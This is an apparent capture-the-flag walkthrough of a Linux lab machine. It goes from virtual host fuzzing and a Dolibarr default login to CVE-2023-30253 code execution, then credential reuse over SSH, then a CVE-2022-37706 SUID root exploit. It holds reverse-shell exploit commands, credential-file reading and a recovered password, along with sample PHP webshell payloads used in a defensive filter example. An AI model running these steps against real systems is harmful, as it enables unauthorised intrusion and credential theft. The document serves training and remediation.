Overview

BoardLight is an easy Linux machine that demonstrates how virtual host enumeration can uncover a vulnerable Dolibarr instance, where default credentials lead to authenticated code execution and eventual root access through a vulnerable Enlightenment SUID binary.

Attack Chain

  • Enumerate exposed services and identify SSH (22) and HTTP (80)
  • Discover the board.htb domain from the web application
  • Fuzz virtual hosts and identify crm.board.htb
  • Log in to Dolibarr 17.0.0 with default credentials
  • Exploit CVE-2023-30253 for authenticated remote code execution
  • Gain a shell as www-data
  • Recover database credentials from conf.php
  • Reuse the password to authenticate as larissa over SSH
  • Identify vulnerable Enlightenment SUID binaries
  • Exploit CVE-2022-37706 to gain a root shell

Enumeration

Port Scanning

We start by defining the target and running a full TCP port scan to identify the exposed services.

export IP=10.129.231.37; export NAME=BOARDLIGHT; echo $IP; echo $NAME; ping $IP -c 1

nmap --min-rate 4500 --max-rtt-timeout 1500ms $IP -p- -v -oA scans/nmap_allports_$NAME

ports=$(cat scans/nmap_allports_$NAME.nmap | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); echo $ports

nmap $IP -p$ports -A -oA scans/nmap_initial_$NAME -v

The open TCP ports are:

22,80

nmap results

Findings

The scan reveals a small attack surface with SSH (22) and HTTP (80) exposed. Since SSH usually requires valid credentials, the web service becomes the primary enumeration target.


Web Enumeration

Main Website

Browsing to port 80 shows a basic website for a cybersecurity company.

main website

While reviewing the site, the "What we do" section reveals the domain board.htb. This is added to /etc/hosts so the site can be resolved by hostname.

echo "$IP board.htb" | sudo tee -a /etc/hosts

domain discovery

Virtual Host Fuzzing

With the domain identified, we fuzz for additional virtual hosts using ffuf.

ffuf -u http://board.htb -c -ic -H "HOST: FUZZ.board.htb" -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -t 100 -mc all -fw 6243

The scan identifies a subdomain called crm.

ffuf vhost

The new virtual host is added to /etc/hosts.

echo "$IP crm.board.htb" | sudo tee -a /etc/hosts

Dolibarr CRM

Browsing to http://crm.board.htb reveals a Dolibarr 17.0.0 application.

dolibarr login

Trying common default credentials succeeds with admin:admin.

dolibarr admin login

This is important because Dolibarr 17.0.0 is affected by CVE-2023-30253, an authenticated vulnerability that can be abused to execute code by injecting PHP into editable content.
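The page does not spell out the failing check, but the public advisory for CVE-2023-30253 describes the bypass as an uppercase `<?PHP` tag slipping past a case-sensitive filter on stored website content. The following is an added example, not Dolibarr's code: a naive filter of that kind beside the hardened, case-insensitive check a CMS that stores user-editable HTML should apply, run over constructed sample payloads.

```python
import re

# Constructed sample content as a content filter or log reviewer would see it
# in a CMS page body. Nothing here is executed; each sample is only classified.
SAMPLES = {
    "plain_html":  "<h1>Welcome</h1><p>Contact us</p>",
    "lowercase":   "<h1>Hi</h1><?php system($_GET['c']); ?>",
    "uppercase":   "<h1>Hi</h1><?PHP system($_GET['c']); ?>",  # CVE-2023-30253 style
    "mixed_case":  "<?Php echo 1; ?>",
    "short_echo":  "<?= shell_exec('id') ?>",
    "script_lang": "<script language='PHP'>echo 1;</script>",
    "xml_decl":    '<?xml version="1.0"?><root/>',
}


def naive_contains_php(content: str) -> bool:
    """Illustrative vulnerable check: exact, case-sensitive match only."""
    return "<?php" in content


# Hardened check. Any "<?" opener except the XML declaration is treated as
# PHP, because with short_open_tag enabled "<?" alone starts code, and
# "<?=" is always an echo tag. The legacy <script language="php"> form is
# also covered. Matching is case-insensitive, which is the whole point.
_PHP_OPENER = re.compile(
    r"<\?(?!xml\b)"
    r"|<script\b[^>]*\blanguage\s*=\s*[\"']?php[\"']?",
    re.IGNORECASE,
)


def hardened_contains_php(content: str) -> bool:
    """Reject rather than sanitise: untrusted HTML must never reach eval."""
    return bool(_PHP_OPENER.search(content.replace("\x00", "")))


def classify(samples: dict) -> dict:
    """Per sample, report which check flags it so the bypass is visible."""
    return {
        name: {
            "naive": naive_contains_php(body),
            "hardened": hardened_contains_php(body),
        }
        for name, body in samples.items()
    }


if __name__ == "__main__":
    for name, verdict in classify(SAMPLES).items():
        print(f"{name:12s} naive={verdict['naive']!s:5s} hardened={verdict['hardened']}")
```

The "uppercase", "mixed_case" and "short_echo" rows pass the naive check and are caught only by the hardened one; the XML declaration is left alone so ordinary documents are not rejected.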


Foothold

Dolibarr Authenticated RCE

Although the issue can be exploited manually by injecting PHP into HTML content, I used a public proof-of-concept for CVE-2023-30253.

https://github.com/Rubikcuv5/cve-2023-30253

After cloning the repository and activating a Python 3.11 virtual environment, the exploit is ready to run.

exploit setup

A penelope listener is started on port 443, and the exploit is executed with the default Dolibarr credentials.

python CVE-2023-30253.py -u admin -p admin -r 10.10.14.137 443

exploit execution

The exploit returns a shell as www-data.

www-data shell


Lateral Movement

Configuration File Enumeration

From the web shell, the Dolibarr configuration directory is inspected. Inside /var/www/html/crm.board.htb/htdocs/conf, the file conf.php stands out.

conf php location

Reading the file reveals stored database credentials.

conf php credentials

The recovered password is:

serverfun2$2023!!

Password Reuse Against SSH

After obtaining the credentials from the configuration file, we need to identify a valid user on the system to test them against.

One way to do this is by listing the contents of /home:

ls /home

Alternatively, we can inspect /etc/passwd to identify users with valid shell access:

cat /etc/passwd | grep -E "sh$"

From this, we identify the user larissa.

The password is then tested against this user over SSH using hydra:

hydra -l larissa -p 'serverfun2$2023!!' $IP ssh

The credentials are valid.

hydra ssh success

larissa:serverfun2$2023!!

With the password confirmed, we connect over SSH.

ssh larissa@$IP

This gives us an interactive shell as larissa.

larissa ssh shell

The user flag can now be read.

cat /home/larissa/user.txt

user flag


Privilege Escalation

LinPEAS Enumeration

After gaining access as larissa, linpeas.sh is executed to look for local privilege escalation paths.

The output highlights several Enlightenment binaries with the SUID bit set.

linpeas enlightenment suid

We check the installed version.

enlightenment --version

The target is running Enlightenment 0.23.1.

enlightenment version

This version is vulnerable to CVE-2022-37706. The issue affects enlightenment_sys before version 0.25.4, where a setuid root binary mishandles pathnames beginning with /dev/.., allowing local privilege escalation.
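The two signals that make this box exploitable, setuid Enlightenment helpers on disk and a version older than 0.25.4, are easy to audit for on a fleet. The following is an added example written for this page (not linpeas or the exploit repository's code); it assumes only that `enlightenment --version` prints a dotted x.y.z version somewhere in its output, which is not shown on the page.

```python
import os
import re
import stat
from pathlib import Path

# CVE-2022-37706 is fixed in Enlightenment 0.25.4 (from the text above).
FIXED_VERSION = (0, 25, 4)


def parse_version(output: str):
    """Pull the first x.y.z triple out of `enlightenment --version` output.
    Assumption: the exact output layout is unknown, so any dotted triple
    on any line is accepted. Returns None when no version is present."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", output)
    return tuple(int(x) for x in m.groups()) if m else None


def is_vulnerable_version(version) -> bool:
    return version is not None and version < FIXED_VERSION


def find_suid_binaries(root: str, name_prefix: str = "enlightenment"):
    """Return regular files under root with the setuid bit whose basename
    starts with name_prefix (the class of files linpeas surfaced)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.startswith(name_prefix):
                continue
            path = Path(dirpath) / name
            try:
                st = path.lstat()  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(str(path))
    return sorted(hits)


def audit(root: str, version_output: str) -> dict:
    """At risk only when both conditions hold: setuid helpers present and
    the installed version predates the fix."""
    version = parse_version(version_output)
    suid = find_suid_binaries(root)
    return {"version": version, "suid_binaries": suid,
            "at_risk": bool(suid) and is_vulnerable_version(version)}


if __name__ == "__main__":
    import subprocess
    try:
        out = subprocess.run(["enlightenment", "--version"],
                             capture_output=True, text=True).stdout
    except FileNotFoundError:
        out = ""
    print(audit("/usr", out))
```

Remediation for a hit is to upgrade to 0.25.4 or later, or strip the setuid bit from the helper until that is possible.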

Exploiting CVE-2022-37706

A public exploit is available on GitHub.

https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit

The exploit is transferred to the target.

transfer exploit

Running the exploit returns a root shell.

root shell

The root flag can now be read.

cat /root/root.txt

root flag


Key Takeaways

BoardLight shows how a small web-facing attack surface can still lead to full compromise. Virtual host enumeration exposed the CRM application, default credentials allowed access to a vulnerable Dolibarr version, and a configuration file disclosed reusable credentials for SSH. The final escalation came from an outdated SUID Enlightenment binary vulnerable to CVE-2022-37706.